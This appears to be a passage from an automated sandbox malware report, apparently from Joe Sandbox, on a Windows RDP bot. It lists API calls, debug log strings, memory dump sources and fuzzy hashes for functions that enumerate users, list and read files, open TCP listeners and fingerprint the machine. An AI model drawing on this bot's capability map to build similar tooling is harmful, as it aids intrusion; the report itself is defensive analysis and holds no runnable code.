WSAGetLastError 61338->61340 61341 7ff8b91521b5 61338->61341 61342 7ff8b9151292 6 API calls 61339->61342 61343 7ff8b9151292 6 API calls 61340->61343 61341->61287 61342->61341 61343->61341 61345 7ff8b9152377 61344->61345 61346 7ff8b9152381 WSAGetLastError 61344->61346 61345->61288 61347 7ff8b9151292 6 API calls 61346->61347 61347->61345 61348->61286 61350 7ff8b91517ab EnterCriticalSection 61349->61350 61351 7ff8b915a016 GetSystemTimeAsFileTime 61349->61351 61350->61327 61351->61350 61353 7ff8b915e3bc 61352->61353 61354 7ff8b915e372 61352->61354 61353->61327 61355 7ff8b915e4c7 61354->61355 61356 7ff8b915e380 

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                    • API String ID: 3624467404-104752423
                    • Opcode ID: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                    • Instruction ID: f97704ef0d59d11db3e2192d24c36f60657465927338c1e70d9870f31ebe3acd
                    • Opcode Fuzzy Hash: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                    • Instruction Fuzzy Hash: 26F15762A08A82C7EB608F1CE45437963A1EB85BD4F564036DB4E87398DF3DF846E741
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 4253334766-243243391
                    • Opcode ID: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                    • Instruction ID: bd2bdf33e10122a31ea8cb8447283695a2e6f47b78ec05a44b7e4fa42167a1b4
                    • Opcode Fuzzy Hash: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                    • Instruction Fuzzy Hash: 51611DB5E0C683D5FB305ADDAC803B92260AF533D4F4451B2EE6E5A2E4DE2CBB458341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 1094913617-243243391
                    • Opcode ID: af09da903b14395032e1ba6ca3dae6091f92bbea98b1b9bcb7bdc89db381bd11
                    • Instruction ID: cad9f485647c6ec14708d7541b60ed351917eef922ed8a74d1aeea2051f6efce
                    • Opcode Fuzzy Hash: af09da903b14395032e1ba6ca3dae6091f92bbea98b1b9bcb7bdc89db381bd11
                    • Instruction Fuzzy Hash: 36613E2AE3D95385FB60FA149C48BB8F260AF10358FD40133D85E57AD1DF2CE9A58369
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                    • API String ID: 1361071942-3382179125
                    • Opcode ID: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                    • Instruction ID: d1b092fe55e559ef2bf61db313e48846db6f1cf5b48348ad783265ac7f33d98f
                    • Opcode Fuzzy Hash: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                    • Instruction Fuzzy Hash: 23619322A0C6C796FA219F0CE84037962A1AF857D4F664036DB4D476D0EE3EF886F711
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                    • API String ID: 3590747132-3524496754
                    • Opcode ID: 9ea2081c4a1fdd313a523ca3c587639682e00fdbf96388af516a9823ae8be453
                    • Instruction ID: c24fae04fa2e60828a87f49197b46eb6a80401236df1fc03fa6e287cb62acd1d
                    • Opcode Fuzzy Hash: 9ea2081c4a1fdd313a523ca3c587639682e00fdbf96388af516a9823ae8be453
                    • Instruction Fuzzy Hash: CC31A861A08A0646E6289BBDA81627577A0AF457FCF043335DF7E477E2EE3DE4498700
                    APIs
                    • strcmp.MSVCRT ref: 00007FF708878C62
                    • strcmp.MSVCRT ref: 00007FF708878C75
                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF708878CB1
                    • _read.MSVCRT ref: 00007FF708878D07
                    • GetLastError.KERNEL32 ref: 00007FF708878D26
                      • Part of subcall function 00007FF7088788EE: FreeLibrary.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF70887892F
                      • Part of subcall function 00007FF7088788EE: GetProcessHeap.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF708878962
                      • Part of subcall function 00007FF7088788EE: HeapFree.KERNEL32(?,?,00000000,000001B9FFF913D0,00007FF708878CDE,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8), ref: 00007FF708878973
                      • Part of subcall function 00007FF7088789AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF708878CE3,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8,00000000), ref: 00007FF7088789DB
                      • Part of subcall function 00007FF7088789AA: HeapFree.KERNEL32(?,?,00000000,00007FF708878CE3,?,?,?,?,?,?,00000001,00007FF708878E4A,?,?,00007FF7088884F8,00000000), ref: 00007FF7088789EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                    • API String ID: 3617873859-308889057
                    • Opcode ID: 632fe087bb1aecd27532cf3bc7a0e494a42c5e1ffc9089c655d61d3dd8c330ec
                    • Instruction ID: 2a1bc7ac514cd4760a71e6a8a3566bccf4914a20d6ebca4e60d1f52ec6ea1e9d
                    • Opcode Fuzzy Hash: 632fe087bb1aecd27532cf3bc7a0e494a42c5e1ffc9089c655d61d3dd8c330ec
                    • Instruction Fuzzy Hash: F6513B21E2D60381FA60F714AC88BB9D2B0AF59744FD41432D50E466E2DF5DE8E4873E
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                    • String ID:
                    • API String ID: 3714283218-0
                    • Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                    • Instruction ID: 681d692235112c379164a904fae75d47fe6108224ba65d87b6be7bc68f26e93d
                    • Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                    • Instruction Fuzzy Hash: 8D511A25A28A47C5EA51FB11EC54A79F3A0AF48B84F844435D90D8B7D1EF3CE4A0832C
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                    • Instruction ID: 6f5303a74057ad607c5b78138d8cd0fc7aeb99e52170f154457bfad031e27db1
                    • Opcode Fuzzy Hash: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                    • Instruction Fuzzy Hash: DA118C51E0C69381FA216F2DA8406B912106F427E4F529730DA3D9AAE5EF1CF946E300

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    • API String ID: 2897271634-4162578512
                    • Opcode ID: 066b0039191f1d6ba5b6da45dd2910b987306dccb441d82a47b06479b931fc89
                    • Instruction ID: fa43901f16ce714c0e4427f22b3a29f5259df7e81dc25cd4f965efcb50240fe6
                    • Opcode Fuzzy Hash: 066b0039191f1d6ba5b6da45dd2910b987306dccb441d82a47b06479b931fc89
                    • Instruction Fuzzy Hash: D9D16F62A29A0381FA20FB15ED40FB8E761AF54794FD54032C94E472E5DF3CE5A9C328

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                    • API String ID: 3214881788-719614687
                    • Opcode ID: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                    • Instruction ID: 316f7cabc6ace3ccd4129ea2dcc53c8324bd2b2dcd8bf77b81e298491aafb6b7
                    • Opcode Fuzzy Hash: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                    • Instruction Fuzzy Hash: 58F1EA20A0CF0785FB285BDCE8963781390AB05BEDF142372D76E063E2DE6DA9859355

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                    • Instruction ID: 496679b481f52713cffa1383241b7b3b0ca25ccd83f21ba4c5202b7748923bf6
                    • Opcode Fuzzy Hash: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                    • Instruction Fuzzy Hash: 0FD1A021E0C657C1FB249B9CE4807B867A0AF857D8F559037CB5E476A6DE2CEC84C781

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                    • Instruction ID: 5e24a748ca0a910ce2c7f30d5d750ac1344da967546ca05caaa87a91743d58c4
                    • Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                    • Instruction Fuzzy Hash: 4BD15B62E0C656D5FA249BDCE4723B9B7A0AF407D8F194132CB4E477A4DE2CF8848781

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                    • Instruction ID: 57d204d98a844dc10ff390f7b1ba0b97585744d8058b5b50d930e206ccf40b2a
                    • Opcode Fuzzy Hash: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                    • Instruction Fuzzy Hash: 09D15965E0C7D781FB218F1DE8403B862A0AF417D4F964032DB5E472A6DE2DF884B792

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                    • Instruction ID: 83a1c38ba7d02ff4256f65cf155754944c0ef5c87e64cdc40de87c248c2625ab
                    • Opcode Fuzzy Hash: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                    • Instruction Fuzzy Hash: 80D17521E0CA5385FB298B9CE8623B963A0EF417DCF156033CB4E57696DE2DEC499341

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                    • Instruction ID: 34ccbaca7a4e1c7f37488826fceb1f2295cd5b1b851f143999c5ec2b6b174b42
                    • Opcode Fuzzy Hash: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                    • Instruction Fuzzy Hash: 78D15B71E0C652C2F6308B9DAC843BA2260AF437E4F5540F2DF5E472B4DE2DAA848385

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                    • Instruction ID: b3bf22cab428c52db068d7083d2ad9d40cce2f7d42920e4353f3dfbedd385ec5
                    • Opcode Fuzzy Hash: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                    • Instruction Fuzzy Hash: F4D18D21E0C6D682FA60EF1CE4843B87A95AF417E4F564132CB9E072A2DE6DAC45B741

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
